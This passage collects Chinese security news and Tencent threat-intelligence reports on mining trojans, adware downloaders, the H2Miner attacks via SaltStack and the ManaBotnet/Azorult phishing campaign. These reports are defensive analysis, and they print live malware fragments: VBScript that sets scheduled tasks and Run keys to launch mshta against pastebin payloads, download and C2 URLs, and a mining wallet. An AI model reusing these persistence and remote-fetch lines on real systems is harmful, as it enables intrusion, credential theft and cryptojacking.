感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/eBPMlCSbYM_Ql5Mky9XTAw 一、概述 近期腾讯安全威胁情报中心检测到网络游戏《魔域》私服传播挖矿木马和远程控制木马。木马首先伪装成游戏保护进程TQAT.exe随着游戏启动而执行，随后释放大灰狼远控木马DhlServer.exe，并利用远控木马的下载执行功能继续下载门罗币挖矿木马ws.exe，腾讯安全威胁情报中心将其命名为MoyuMiner。 大灰狼远控木马安装后会完全控制用户系统，上传用户文件，窃取隐私，在用户电脑下载安装其他木马，利用用户电脑做跳板攻击其他系统。而门罗币挖矿木马运行之后，会增加系统资源消耗，影响游戏软件的流畅运行。 《魔域》是网龙网络控股有限公司研发的大型网络游戏，在外网存在较多私服版本，这些私服版本游戏由于不受官方控制，容易成为病毒木马的传播渠道，截止目前MoyuMiner已感染超过5000台电脑。腾讯电脑管家和腾讯T-Sec终端安全管理系统均可查杀该病毒。 二、解决方案 针对MoyuMiner挖矿木马，腾讯系列安全软件已支持全面检测和拦截。 三、样本分析 传播大灰狼远控木马的游戏为《魔域》，并且是由私服下载的版本，官网下载的游戏安装包不包含病毒。 通过溯源分析发现，传播病毒的部分游戏文件md5和文件路径如下： 木马伪装成游戏的保护模块C:\Program Files(x86)\NetDragon\魔域-御剑天下\TQAT\TQAT.exe，随着游戏启动而运行。 TQAT.exe拷贝自身到：C:\Users\Administrator\AppData\Roaming\TQAT.exe，然后释放大灰狼远控木马到Temp目录：C:\Users\Administrator\AppData\Local\Temp\DhlServer.exe、 C:\Users\Administrator\AppData\Local\Temp\DHLDAT.exe DhlServer.exe申请内存空间，解密出大灰狼DLL文件并通过LoadLibrary加载执行。 大灰狼DLL具有标记SER-V1.8，导出3个函数：DllFuUpgStop、DllFuUpgradrs、DllEntryPoint供调用。 远控木马部分协议字段如下： 大灰狼远控木马利用下载并执行文件的功能下载挖矿木马母体http[:]//www.baihes.com:8285/ws.exe，存放至C:\Windows\SysWOW64\ws.exe。ws.exe运行后释放文件BthUdTask.exe、BthUdTask.dll，BthUdTask.exe通过写入垃圾数据增肥文件大小到超过70兆。 BthUdTask.exe解密BthUdTask.dll得到门罗币矿机程序System.exe，然后连接矿池141.255.164.28:5559挖矿 IOCs Md5 1a0f5b63b51eb71baa1b3b273edde9c9 a5532e7929a1912826772a0e221ce50f 1b6a3fa139983b69f9205aabe89d6747 418b11efdd38e3329fbb47ef27d64c14 37dff5776986eb5f6bb01c3b1df18557   Domain fujinzhuang.f3322.net linbin522.f3322.net mine.gsbean.com www.baihes.com   C2 116.202.251.12:8585 114.115.156.39:9624 43.248.188.172:30017   URL http[:]//www.baihes.com:8285/ws.exe http[:]//www.baihes.com:8282/cpa.exe

据外媒报道，愿意为苹果iOS操作系统漏洞支付200万美元的Zerodium表示，由于最近针对该平台的黑客数量的大幅增加，该公司宣布暂停购买该平台漏洞。换言之，这家公司不再愿意在iOS黑客身上花那么多的钱–只因参与其中的黑客太多了。 Zerodium表示，针对iOS的攻击数量激增的一个可能原因是，越来越多的研究人员在寻找苹果操作系统中的安全漏洞以及可以通过逆向工程仔细检查代码的越狱。而由此带来的后果是，该公司在几个月内不再对iOS漏洞的具体类型感兴趣。 这家在Twitter宣布称：“在接下来的2到3个月里，我们不会收购任何新的苹果iOS LPE、Safari RCE或sandbox escapes，因为这些矢量相关的提交数量很高。”在不久的将来，没有持久性的iOS一键式内容的价格可能会下降。” Zerodium CEO兼创始人Chaouki Bekrar表示：“只有PAC和非持久性才能阻止它走向零……但我们看到许多绕过PAC的漏洞，还有一些持续漏洞（0日）在所有iPhone / iPad上都存在。让我们期待iOS 14会更好。” 苹果预计将在今秋发布iOS 14，极有可能跟新一代iPhone一起发布。然而，该操作系统更新的预览版预计将在WWDC会议上发布，并在会议结束后不久向测试人员发布早期测试版。   （稿源：cnBeta，封面源自网络。）

Zerodium 是一个漏洞利用获取平台，旨在向研究人员支付一定的费用来收买零日安全漏洞，然后转手卖给政府和执法机构等客户。然而本周，Zerodium 竟然宣布 —— 由于短期内提交的 iOS 漏洞利用程序太多，其计划在未来 2~3 个月内不再购买此类内容。据悉，Zerodium 专注于高风险的漏洞，通常每个功能完善的 iOS 漏洞利用会被给予 10 万到 200 万美元的奖励。 Zerodium 首席执行官 Chaouki Bekrar 在一条推文中表示，iOS 的安全状况并不如大家所想的那样良好，并指出持续有一些影响所有 iPhone 和 iPad 零日漏洞利用出现。当然，Bekrar 还是希望 iOS 14 能有所改善。 除了 Zerodium 等第三方，苹果也有自己的漏洞赏金计划。若发现 iOS、iPadOS、macOS、tvOS 或 watchOS 中的安全漏洞，将被给予 5000 到 100 万美元的奖励。   （稿源：cnBeta，封面源自网络。）

北京时间4月29日消息，作为全球最大的主权财富基金Norfund基金因网络诈骗，被骗子轻而易举的骗走1000万美元，而骗子是利用了所谓“泄露的付款数据”这一缺陷来作案的。 报道，挪威主权基金Norfund（也被称为挪威国家基金）的资金来源于著名的北海油田收益，目前市值超过1万亿美元。该基金表示，有黑客操纵了该组织的一笔交易，将一笔原本打算借给柬埔寨一家小额信贷机构的贷款转入受骗子控制的一个账户，结果导致该基金在3月份被骗1亿克朗（约为1000万美元）。该基金表示，这笔钱似乎已经从柬埔寨转移到了墨西哥，由于损失巨大，国际警方已经介入调查此事。 Norfund周三在谈到这起网络攻击诈骗案时表示：“在这段时间里，诈骗者以一种在结构、内容和语言使用上都非常巧妙的方式，操纵和伪造了Norfund与借款机构之间的信息交换。文件和付款明细都是伪造的。”骗子用一些伪造的发票或伪造的电子邮件把钱转移到了其他的账户，说明整个交易过程对票据的把关不过关。 其实这个骗局很简单，但却非常有效。骗子会先欺骗公司里的某个关键人物，然后欺骗公司里的其他人把钱转到一个新账户里，因为这些付款在计划中是合法和得到授权的，所以受害者通常要到最后才反应过来。 首席执行官Tellef Thorleifsson承诺，将迅速与国际警方采取行动，将骗子绳之以法，并防止该组织再次被骗。他表示：“这是一起严重的事件。这一网络诈骗行为清楚地表明，我们作为一个国际投资者和发展组织， 在利用数字渠道时很容易受到攻击。发生这种情况的事实表明，我们的系统和管理还不够好。我们必须立即采取严肃的行动来纠正这种情况。” 据悉，除警方介入外，挪威主权基金还表示，它正与挪威外交部及旗下的银行DNB合作，追踪这个骗子并取回赃款。普华永道也被要求对该基金的IT安全设置进行评估。虽然成为此类网络攻击的受害者令人尴尬，但Norfund并不是唯一一家。如果这件事的核心在于互联网交易中的商务邮件欺诈，那么说明这种网络欺诈已形成一个数十亿美元的产业，情况只会变得更糟。   （稿源：凤凰网科技，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/afn9jkgaDqX2wIoHk4G6JQ 一、概述 腾讯安全威胁情报中心在进行例行高广风险文件排查时，发现一个名为DTCenSvc.exe的文件异常之高，腾讯安全大数据显示已有超2万台电脑中招。经分析该文件运行后会在用户机器内安装一系列的广告弹窗程序、主页篡改程序。 溯源后发现，该病毒运行过程中的部分文件、域名等基础设置与DT下载器家族恶意传播推广资源一致。软件供应链传播病毒国内时有发生，下载器问题尤显突出。腾讯安全专家提醒用户避免从易受污染的软件下载站下载，高风险下载渠道极易感染挖矿木马、勒索软件、广告弹窗、浏览器主页被锁等问题。 二、解决方案 互联网上充斥各种小众软件分发渠道，这些渠道或良莠不齐，或管理混乱，用户通过这些小众渠道搜索下载软件时，极易感染病毒木马，被捆绑安装不需要的其他软件。 腾讯安全专家建议网民尽可能通过相应软件的官方网站下载软件，或者使用安全软件提供的软件管理功能搜索下载相应软件。腾讯电脑管家及腾讯T-Sec终端安全管理系统已升级查杀DT下载器木马，内置的软件管理功能提供高速下载、自动去除插件安装、自动卸载恶意软件、管理软件的自动开机加载及广告弹出等特色功能。 三、病毒样本分析 DTCenSvc.exe运行后会释放执行yDwpSvc.exe模块，并将其设置为服务启动。yDwpSvc则通过地址hxxp://down.hao3603.com/rcsvccfg10.ini获取配置文件，并拉取配置中的文件执行。 目前配置中保存了两个RUL，分别为： hxxp://down.hao3603.com/qd/MiniSetup.exe链接内的MiniSetup安装包文件，hxxp://down.hao3603.com/qd/ObtainSysInfo.exe链接内的ObtainSysInfo包文件。 MiniSetup.exe包运行后会在系统内安装广告弹窗相关模块，包含一个Mini页弹窗，一个窗口右下角弹窗。但由于两个弹窗均无来源标识说明，部分用户也难以对其进行卸载删除，用户看到此类广告后会感到极度反感。 ObtainSysInfo.exe是一个主页修改相关的包程序，该程序运行后会首先检查环境内是否有安全软件相关进程，如果判断当前运行环境处于安全软件保护中。则不执行后续浏览器主页相关配置等修改逻辑。否则进一步通过从云端两次拉取加密包，解密解压缩后内存中执行DLL恶意代码。进而修改感染病毒机器内的主页，收藏等信息。 ObtainSysInfo.exe运行后会首先避开安全软件进程，安全软件进程字串使用循环异或1-5的方式动态解密后再使用 循环异或1-5后解密出如下安全软件进程 随后通过地址hxxp://down.1230578.com/UpdateProfile.7z拉取加密的包文件 通过在内存中对加密后的UpdateProfile.7z进行解密解压缩后得到名为SetVecfun.dll并执行其导出函数plugin_lock SetVecfun.Dll模块其plugin_lock内代码执行后会进一步再次拉取 hxxp://down.1230578.com/SetFunVec.7z地址内的加密包文件，解密解压后内存调用其内的浏览器修改相关接口函数。 再次Dump后可知该Dll提供了各浏览器的修改接口供调用者使用，主要通过修改注册表信息，修改浏览器配置信息，修改浏览器本地数据库信息等方式。进而达到对各浏览器的主页，收藏，启动快捷方式进行修改。 例如通过修改谷歌浏览器配置文件修改主页信息，通过注册表相关位置修改IE浏览器主页等。部分安全软件监控下的敏感位置在进行篡改操作时同样会通过进程进行环境判断从而达到避开安全软件提示的目的。 被劫持的浏览器主页地址信息会被同时保存在注册表以下位置内。 HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\llqm_* 同时还会进一步遍历TaskBar目录文件，来修改浏览器快捷方式，在其快捷方式后添加劫持参数，带到从快速启动栏启动浏览器时进入劫持主页地址 同时进一步修改了浏览器收藏文件夹信息，将大量的电商，算命等广告内容植入浏览器收藏夹内。 例如下入中浏览器主页，收藏信息已被篡改 四、病毒溯源分析 经过溯源分析，我们找到了一个同样会传播病毒相关模块的某款下载器的早期版本，该早期版本下载器同样会释放名为DTPageSet.Exe的模块执行。 比对可知，本次传播的病毒ObtainSysInfo.exe模块同下载器释放的DTPageSet.Exe拥有基本一致的代码内容，且本地病毒使用的hxxp://down.1230578.com/SetFunVec.7z恶意代码投递地址与下载器hxxp://down.1230578.com/DTPageSet.exe域名一致。 该下载器同样存在恶意修改浏览器主页信息，静默推装多款应用的行为，会在用户电脑静默安装病毒文件和推广安装用户不需要的多个软件。 附录 IOCs MD5： aa8c5fffd2de7bd7c39f90a9392d8db0 7348a00072d3d45e6006d7945744d962 fbb1a7653d715b8f56e54917adb2450e b6efb80f8c28a9c95fa3353d534c13d8 b1766aad514d1d84d3ed360c35d88f78 Domain: down.hao3603.com down.1230578.com URL: hxxp://down.hao3603.com/qd/MiniSetup.exe hxxp://down.hao3603.com/qd/ObtainSysInfo.exe hxxp://down.1230578.com/SetFunVec.7z hxxp://down.1230578.com/UpdateProfile.7z hxxp://down.1230578.com/DTPageSet.exe

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/eLnQxa_hXxhNhyquOThW7Q 一、概述 腾讯安全威胁情报中心于2020年05月03日检测到H2Miner木马利用SaltStack远程命令执行漏洞（CVE-2020-11651、CVE-2020-11652）入侵企业主机进行挖矿。通过对木马的核心脚本以及可执行文件的对比分析，我们确认了此次攻击行动属于挖矿木马家族H2Miner。 H2Miner是一个linux下的挖矿僵尸网络，通过hadoop yarn未授权、docker未授权、confluence RCE、thinkphp 5 RCE、Redis未授权等多种手段进行入侵，下载恶意脚本及恶意程序进行挖矿牟利，横向扫描扩大攻击面并维持C&C通信。 腾讯安全威胁情报中心大数据统计结果显示，H2Miner利用SaltStack漏洞的攻击自5月3日开始，目前呈快速增长趋势。H2Miner挖矿木马运行时会尝试卸载服务器的安全软件，清除服务器安装的其他挖矿木马，以独占服务器资源。目前，H2Miner黑产团伙通过控制服务器进行门罗币挖矿已非法获利超370万元。 二、样本分析 Saltstack是基于python开发的一套C/S自动化运维工具。近日，SaltStack被爆存在认证绕过漏洞（CVE-2020-11651）和目录遍历漏洞（CVE-2020-11652），其中： CVE-2020-11651：为认证绕过漏洞，攻击者可构造恶意请求，绕过Salt Master的验证逻辑，调用相关未授权函数功能，达到远程命令执行目的。 CVE-2020-11652：为目录遍历漏洞，攻击者可构造恶意请求，读取服务器上任意文件，获取系统敏感信息信息。 漏洞影响版本 SaltStack < 2019.2.4 SaltStack < 3000.2 安全研究人员在得到企业授权后，对中招机器进行排查，在/var/log/salt/minion日志中发现攻击时的恶意文件下载行为： 该下载行为正是利用SaltStack漏洞攻击成功后执行的远程命令，命令通过curl或wget下载和执行脚本sa.sh（http[:]//217.12.210.192/sa.sh），脚本sa.sh具有以下功能： 1、卸载防御软件阿里云骑士、腾讯云镜。 2、通过端口、文件名、进程名、钱包地址匹配匹配找到竞品挖矿木马，删除对应的进程和文件，杀死正在运行的竞争对手的Docker容器并删除其镜像。 3、检查文件/tmp/salt-store是否存在，md5是否为“8ec3385e20d6d9a88bc95831783beaeb”。 4、salt-store不存在或md5不正确则下载该文件至tmp目录下。 下载得到的salt-store采用Golang编写，被编译为Linux平台可执行程序，主要有以下功能： 下载文件并执行 启动和维持挖矿程序 与C&C服务器通信，接收并执行远程命令 利用masscan对外扫描 针对redis服务进行爆破攻击 salt-store从http[:]//206.189.92.32/tmp/v下载XMRig挖矿木马，保存为/tmp/salt-minions，然后启动连接矿池xmr-eu1.nanopool.org挖矿，配置中使用门罗币钱包为： 46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb 目前该钱包已挖矿获得8236个门罗币，获利折合人民币超过370万元。该黑产团伙的战果显示：入侵控制Linux服务器挖矿已是黑产生财之道，采用Linux服务器的企业万不可掉以轻心。 三、关联家族分析 此次攻击中sa.sh（e600632da9a710bba3c53c1dfdd7bac1）与h2miner使用的 ex.sh（a626c7274f51c55fdff1f398bb10bad5）脚本内容呈现高度相似： 上述标记中sa.sh对比ex.sh唯一缺少的代码是通过crontab定时任务设置持久化。 而sa.sh和ex.sh主要的任务为下载木马salt-store（8ec3385e20d6d9a88bc95831783beaeb）和kinsing（a71ad3167f9402d8c5388910862b16ae），这两个木马都时采样Golang语言编写，并编译为Linux平台可执行程序，两个样本代码结构高度相似、并且完成的功能几乎相同，因此我们认为两者属于同一家族。 四、安全建议 腾讯安全专家建议企业采取以下措施强化服务器安全，检查并清除服务器是否被入侵安装H2Miner挖矿木马。 1.将Salt Master默认监听端口（默认4505 和 4506）设置为禁止对公网开放，或仅对可信对象开放。将SaltStack升级至安全版本以上，升级前建议做好快照备份，设置SaltStack为自动更新，及时获取相应补丁。 2.Redis 非必要情况不要暴露在公网，使用足够强壮的Redis口令。 3.参考以下步骤手动检查并清除H2Miner挖矿木马： kill掉进程中包含salt-minions和salt-store文件的进程，文件hash为a28ded80d7ab5c69d6ccde4602eef861、8ec3385e20d6d9a88bc95831783beaeb； 删除文件/tmp/salt-minions、/tmp/salt-store； 将恶意脚本服务器地址217.12.210.192、206.189.92.32进行封禁； 升级SaltStack到2019.2.4或3000.2，防止病毒再次入侵。 IOCs MD5 e600632da9a710bba3c53c1dfdd7bac1 a28ded80d7ab5c69d6ccde4602eef861 8ec3385e20d6d9a88bc95831783beaeb a626c7274f51c55fdff1f398bb10bad5 a71ad3167f9402d8c5388910862b16ae IP 217.12.210.192 206.189.92.32 144.217.117.146 URL hxxps[:]//bitbucket.org/samk12dd/git/raw/master/salt-store hxxp[:]//217.12.210.192/salt-store hxxp[:]//217.12.210.192/sa.sh hxxp[:]//206.189.92.32/tmp/v hxxp[:]//206.189.92.32/tmp/salt-store hxxp[:]//144.217.117.146/ex.sh hxxp[:]//144.217.117.146/kinsing2 参考链接 通告：针对SaltStack远程命令执行漏洞（CVE-2020-11651、CVE-2020-11652）植入挖矿木马的应急响应 https://mp.weixin.qq.com/s/CtZbXD0CXCemWyAwWhiv2A https://developer.aliyun.com/article/741844

当地时间今天下午，多个iPhone和iPad用户发现他们设备上的iOS应用在运行时出现了崩溃的现象，而这个问题似乎是由应用所使用的Facebook SDK的故障造成的。在一些苹果设备论坛上有多个关于iOS设备上的应用不断出现崩溃的投诉，各种应用似乎都受到了影响，专门用于监测网络服务健康程度的Downdetector仪表盘上更是出现了罕见的全员故障情景。 例如，谷歌的Waze应用无法启动，还有包括Pinterest、Spotify、Adobe Spark、Quora、TikTok等在内的各种常用应用的问题报告。 GitHub上的多个开发者将问题归咎于Facebook的软件开发工具包，这一功能通常被用于签到和登录，更奇怪的是，即使用户没有使用包含的Facebook登录选项的功能，仅仅需要应用程序使用过Facebook SDK，就有机会导致App无法打开的情形。 目前还不清楚这个问题何时能修复，但由于有这么多应用受到影响，可能很快就会得到重视和解决，Facebook很可能会通过服务器更新迅速修复这个问题。   （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/Td6zdGxeOjKEh3nu-vAGdw 一、背景 近期腾讯安全威胁情报中心检测到多个企业受到以PPT文档为诱饵文档的钓鱼邮件攻击。这些钓鱼邮件投递的PPT文档包均含恶意宏代码，宏代码会启动mshta执行保存在pastebin上的远程脚本代码，且pastebin URL是由Bitly生成的短链接。 此次攻击的主要特点为恶意代码保存在托管平台pastebin上：包括VBS脚本、Base64编码的Powershell脚本以及经过混淆的二进制数据。攻击者在后续阶段会通过计划任务下载RAT木马，然后将其注入指定进程执行，RAT会不定期更换，当前获取的RAT 木马是Azorult窃密木马。 对比分析发现，攻击者注册的pastebin账号为”lunlayloo”（ 创建于2019年10月），与另一个账号“hagga”（创建于2018年12月）对应攻击事件中使用的TTP高度相似，因此我们认为两者属于同一家族ManaBotnet，并且”lunlayloo”可能为“hagga”的后继者。 有安全厂商分析认为Pastebin账号“hagga”发起的攻击活动有可能来自组织Gorgon Group，一个疑似来自巴基斯坦或与巴基斯坦有关联的黑客组织。该组织已进行了一系列非法行动和针对性攻击，包括针对英国、西班牙、俄罗斯和美国的政府组织的攻击。 Manabotnet攻击流程 二、详细分析 初始攻击以PPT文档为诱饵，使用的文件名有“SHN FOODS ORDER.ppt”、“PrivateConfidential.ppt”、“Analysis Reports.ppt”、“Order001.ppt”、“payment_receipt.ppt”，邮件主题为Analysis Reports From IDS Group（来自IDS Group的分析报告 ）、Analysis Reports From NHL – Nam Hoang Long Co.,Ltd（来自NHL公司的分析报告）、Purchase Order2020（2020采购订单）、payment_receipt.ppt（付款收据）等。 Analysis Reports.ppt中包含恶意的VBA宏代码。 如果用户选择启用宏，则会执行命令： `mshta https[:]//j.mp/ghostis61hazsba` 远程代码URL是短链接，还原为https[:]//pastebin.com/raw/FssQ8e8e，恶意代码被保存在托管平台pastebin.com。 以同样方式投递的文档SHN FOODS ORDER.ppt中的宏执行的恶意代码为，https[:]//j.mp/ghjbnzmxc767zxg，短链接还原得到https[:]//pastebin.com/raw/RCd2CLNd，该地址的托管恶意代码页面如下： 通过浏览器的调试功能对该代码进行编码转换可得到VBScript代码： 该代码加入了一些字符反转和字符连接操作，以逃避恶意代码检测，然后执行5个操作进行持久化： 1.创建计划任务“Murtaba”，每80分钟运行一次远程hta脚本； 2.执行一次hta脚本； 3.在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2下写入执行hta脚本的命令； 4.在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3下写入执行hta脚本的命令； 5.在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\中写入执行hta脚本的命令。 `CreateObject(“WScript.Shell”).Run StrReverse(“/ 08 om/ ETUNIM cs/ etaerc/ sksathcs”) + “tn ““Murtaba”” /tr ““\”“&` `CreateObject(“WScript.Shell”).Run “””mshta”””“http:\\pastebin.com\raw\B7f3BpDk”“”` `CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2”, “””m” + “s” + “h” + “t” + “a”””“http:\\pastebin.com\raw\eMse7spS”“”, “REG_SZ”` `CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3”, “””m” + “s” + “h” + “t” + “a”””“http:\\pastebin.com\raw\hxKddkar”“”, “REG_SZ”` `CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\”, ““”m” + “s” + “h” + “t” + “a“”””http:\\pastebin.com\raw\v2US1QAY”””, “REG_SZ”` 在计划任务中指定执行的远程hta脚本均https[:]\\pastebin.com\raw\B7f3BpDk，解码为以下文本，同样是一段VBScript代码，在其中以隐藏的方式执行Powershell，首先通过ping google.com测试网络是否连通，然后下载Powershell脚本https[:]//pastebin.com/raw/8ZebE1MG进行base64解码并执行。 计划任务执行的Pastebin保存的VBScript脚本： VBScript通过Powershell执行Pastebin保存的以base64编码的Powershell脚本： Base64解码后： Powershell代码将一个压缩包文件的二进制数据以硬编码形式进行保存，使用时首先将“!”替换为“0x”去除混淆，然后通过IO.MemoryStream将数据读取到内存，最后再使用IO.Compression.GzipStream进行解压，就可以获得一个以.Net编写的DLL并通过Reflection  加载执行： $t=[System.Reflection.Assembly]::Load($decompressedByteArray); Powershell获取的另一个PE直接保存了二进制编码在pastebin的URL（https://pastebin.com/raw/f9c50ewQ）上，使用时首先将‘T_B’替换为‘0x’，在分析过程中发URL被动态更换为了：https://pastebin.com/raw/EmyvkN6m，使用时将“^^_^^”替换为“0x”，还原得到PE文件后，将其注入到notepad.exe的内存中执行： [Givara]::FreeDom(‘notepad.exe’,$Cli2)  https[:]//pastebin.com/raw/f9c50ewQ https[:]//pastebin.com/raw/EmyvkN6m .NET编写的DLL名为Apple.dll，入口调用Fuck.FUN，Fuck.FUN随后启动记事本，掏空现有部分的映射，在记事本进程中分配一个新的缓冲区，向该进程中写入有效负载，然后继续执行线程。这样使得攻击者无需将恶意软件写入磁盘，通过计划任务可定期获取注射器（一段攻击代码，用来将RAT注入其他程序）和RAT，并将RAT注入指定进程的内存中执行。 当前作为Payload被下载执行的是Azorult木马，一种使用Delphi编写的窃密木马变种。Azorult已在俄罗斯论坛上出售，价格最高为100美元。 Azorult窃密木马的大多数功能是获取可以在受害者计算机上找到的各类账号密码，例如，电子邮件帐户，通信软件（例如pidgin、 psi+,、telegram），Web Cookie，浏览器历史记录和加密货币钱包，同时该木马还具有上载和下载文件以及截屏的功能。 三、团伙分析 攻击者使用第三方网站（例如Bitly，Blogspot和Pastebin）可能是为了逃避检测，因为这些网站不会被网络防御方判断为恶意网站。但是，诸如Bitly和Pastebin之类的网站会记录访问某个链接的次数。我们能够确定是谁创建了此Pastebin帖子，并统计该链接被访问了多少次。 例如，从页面可以看到托管“Apple.dll”样本的URL已被查看12000多次。这表明有12000台计算机受此攻击影响。但是，由于攻击者使用的是已知的RAT木马，因此实际受影响的计算机数量可能会少得多，因为许多计算机可能已安装了杀毒软件。 “lunlayloo”在2020年3月30日上传的恶意代码，该账户创建于2019年10月23日。 lunlayloo在2020年4月21日上传的恶意代码，托管“Azorult Rat”，由于最近才更新，被查看只有77次。 分析时发现攻击Azorult Rat回传数据对应的URL为： http[:]//23.247.102.120/manabotnet-work/index.php 该URL中包含的“manabotnet”与另一安全公司发现的Pastebin帖子标题：“ MasterManabots-all-bots”相同，该攻击者的Pastebin账号名称为“hagga”，于2018年12月3日创建，另外由于两次攻击使用的TTP高度相似性，所以我们认为他们属于同一家族ManaBots。   unit42在2019年4月对Pastebin账号“HAGGA”发起的攻击活动进行了详细的分析，基于高水平的TTP，包括使用RevengeRAT，unit42认为其与Gorgon Group组织有关。 （https[:]//unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/） 2019年1月腾讯安全御见威胁情报中心也捕获到疑似来自Gorgon Group组织相关的攻击，）（https[:]//www.freebuf.com/column/193603.html），该攻击以“订单”、“支付详单”等主题的钓鱼邮件针对全球的外贸人士进行攻击，行为类似于腾讯安全威胁情报中心多次披露的”商贸信”，攻击者使用blogspot的订阅功能来保存恶意代码。 综合分析以上几次攻击行动，总结该团伙攻击对应的ATT&CK矩阵对应如下，共涉及约44个TTP技术： Initial Access（初始攻击） T1193 Spearphishing Attachment Execution（执行） T1106 Execution through API T1129 Execution through Module Load T1203 Exploitation for Client Execution T1170 Mshta T1086 PowerShell T1053 Scheduled Task T1064 Scripting T1127 Trusted Developer Utilities Persistence（持久化） T1060 Registry Run Keys / Startup Folder T1053 Scheduled Task Privilege Escalation（权限提升） T1055 Process Injection T1053 Scheduled Task Defense Evasion（防御逃逸） T1140 Deobfuscate/Decode Files or Information T1143 Hidden Window T1170 Mshta T1027 Obfuscated Files or Information T1093 Process Hollowing T1055 Process Injection T1064 Scripting T1127 Trusted Developer Utilities T1102 Web Service Credential Access（凭证获取） T1503 Credentials from Web Browsers T1081 Credentials in Files T1214 Credentials in Registry T1539 Steal Web Session Cookie Discovery（数据发现） T1083 File and Directory Discovery T1012 Query Registry T1518 Software Discovery T1082 System Information Discovery T1007 System Service Discovery Collection（数据采集） T1123 Audio Capture T1119 Automated Collection T1115 Clipboard Data T1213 Data from Information Repositories T1005 Data from Local System T1039 Data from Network Shared Drive T1074 Data Staged T1056 Input Capture T1185 Man in the Browser T1113 Screen Capture T1125 Video Capture Command and Control（命令和控制） T1094 Custom Command and Control Protocol T1024 Custom Cryptographic Protocol T1132 Data Encoding T1001 Data Obfuscation T1219 Remote Access Tools T1105 Remote File Copy T1102 Web Service Exfiltration（数据窃取） T1022 Data Encrypted T1041 Exfiltration Over Command and Control Channel 其中具有该团伙的代表性的TTP技术点为： T1170 Mshta T1086 PowerShell T1053 Scheduled Task T1060 Registry Run Keys / Startup Folder T1093 Process Hollowing T1055 Process Injection T1102 Web Service 在T1102 Web Service技术上，该团伙经常使用的合法外部Web服务为Bitly、Blogspot和Pastebin，这个技术在ATT&CK矩阵中战术条目中同时属于Defense Evasion（防御逃逸）和Command and Control（命令和控制），在具体攻击过程中体现在可以绕过恶意网址检测，以及可以通过修改托管网站上的URL对应的内容动态控制下载的恶意代码。 四、安全建议 Gorgon Group为专业黑客组织，擅长攻击大型企业、行业及政府背景的机构，腾讯安全威胁情报中心推荐相关单位采用腾讯安全完整解决方案提升系统安全性，防止专业黑客的攻击。 IOCs Md5 417eef85b7545b13cb2a5b09508a9b8a cd425ac433c6fa5b79eecbdd385740ab f4479c5553271402ab4ff9a55584a9fd URL http://23.247.102.120/manabotnet-work/index.php 短链接： https[:]//j.mp/ghjbnzmxc767zxg https[:]//j.mp/hdjas6782vnavx https[:]//j.mp/dhajsk67a8sdg https[:]//j.mp/ahjkads78dasa https[:]//j.mp/hdajks6786sa https[:]//j.mp/dbashgdyt23vb Pastebin https[:]//pastebin.com/raw/8ZebE1MG https[:]//pastebin.com/raw/FssQ8e8e https[:]//pastebin.com/raw/RCd2CLNd https[:]//pastebin.com/raw/f9c50ewQ https[:]//pastebin.com/raw/EmyvkN6m https[:]//pastebin.com/raw/B7f3BpDk https[:]//pastebin.com/raw/eMse7spS https[:]//pastebin.com/raw/hxKddkar https[:]//pastebin.com/raw/v2US1QAY 参考链接 https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ https://www.freebuf.com/column/193603.html

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/Gukd2lNr9lE8fluG4bFfSw 一、概述 两年前，腾讯安全威胁情报中心曝光了SYSCON/SANNY木马的活动情况，并且根据关联分析确定跟KONNI为同一组织所为。该组织的攻击对象包括与朝鲜半岛相关的非政府组织、政府部门、贸易公司、新闻媒体等。 SYSCON/SANNY木马是一个非常有特色的远程控制木马，通过ftp协议来进行C&C控制，该后门的主要攻击目标为朝鲜半岛相关的重要政治人物或者要害部门，偶尔也会针对东南亚等国进行攻击。该活动自2017年下半年开始活跃，并且对多个目标进行了攻击活动。被曝光后，该组织活动没有任何减弱的迹象。腾讯安全威胁情报中心根据该组织的特点，在2018年12月将其命名为“Hermit（隐士）”。 2020年，“Hermit（隐士）”APT组织依然保持较高的活跃度，攻击方式和木马行为上也有了较大的更新，因此我们对近期的攻击活动做一个整理，并对木马的一些更新情况做一个详细分析汇总。 二、诱饵 使用带有恶意Office宏代码的攻击诱饵依然是SYSCON/SANNY最常用的攻击方式，此外通过修改字体颜色来伪装宏代码的恶意行为也是该组织的特点之一，该特点一直保持至今。而诱饵的主题依然是紧贴时事热点，尤其是全球新冠疫情（COVID-19）热点以及朝鲜半岛相关的局部热点事件。 例如3月份“Hermit（隐士）”组织使用“口罩仅建议用于照顾COVID-19病人的人使用”的文档标题作为攻击诱饵。 “Hermit（隐士）”使用新冠疫情（COVID-19）口罩话题为诱饵 “Hermit（隐士）”组织使用2020年东京残奥会捐助相关的诱饵  “Hermit（隐士）”组织伪装成2020年朝鲜政策相关话题为诱饵  “Hermit（隐士）”组织使用朝鲜Covid-19疫情相关主题为诱饵 三、恶意宏代码分析 携带恶意宏代码的恶意Office文件几乎是该组织的唯一攻击方式，多数诱饵会在未启用宏的情况下在诱饵文件中显示诱导内容，诱导用户启用宏，在未启用宏的情况下字体为几乎无法查看的灰色。 诱导受害者启用恶意宏代码查看文档 多数诱饵的vba宏代码使用密码保护 宏代码中会调整图片大小以及修改字体颜色，用来隐藏真实的恶意行为 